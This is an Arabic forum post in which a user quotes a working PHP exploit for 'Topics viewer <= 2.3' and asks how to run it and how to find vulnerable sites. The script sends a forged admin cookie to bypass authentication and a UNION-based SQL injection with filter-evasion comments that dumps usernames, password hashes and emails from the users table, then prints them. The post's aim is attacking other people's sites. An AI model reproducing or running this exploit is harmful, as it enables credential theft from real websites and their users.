الموضوع: [استفسار] حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection
عرض مشاركة واحدة
قديم 07-05-2012, 09:12 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Abo MalaK
 
الصورة الرمزية Abo MalaK
 

 
 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road
مطلوب حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3
فهمت تقريبآ 60%

اقتباس
<?

$host="http://www.el3drabyad.com/"; //ضع الموقع المصاب بدل هذا الموقع واستعرض الملف من المتصفح

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email), 3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");

curl_setopt($ch, CURLOPT_******, "admin=ahwak2000;mod=ahwak2000;");

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

$buffer = curl_exec($ch);

if(strpos($buffer,"style.css"))
{

echo "<br> [-]---------------------------------------------[-]<br>";

$reg = '#<li .*>.*:(.*?)؟</span></li>#Us';

preg_match($reg,$buffer,$ahwak);

$s1=explode(",",$ahwak[1]);
$i=1;

foreach($s1 as $ayrik){

print "<br> <b>[$i] ".trim($ayrik)."</b><br>";

$i++;

}

echo "<br> [-]---------------------------------------------[-]<br><b><font color=red>z.u5@hotmail.com</font></b>";

}

?>

طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?
+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم

p,g eyvm Topics viewer <= 2>3 Authentication Bypass & SQL Injection

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم من كل انسان ظلـمـتــــه
استغفر الله العظيم من كل صالح جـفــوتــــه
استغفر الله العظيم من كل ظالم صاحـــبتــه
استغفر الله العظيم من كل بـــر أجـــــلتـــــه
استغفر الله العظيم من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس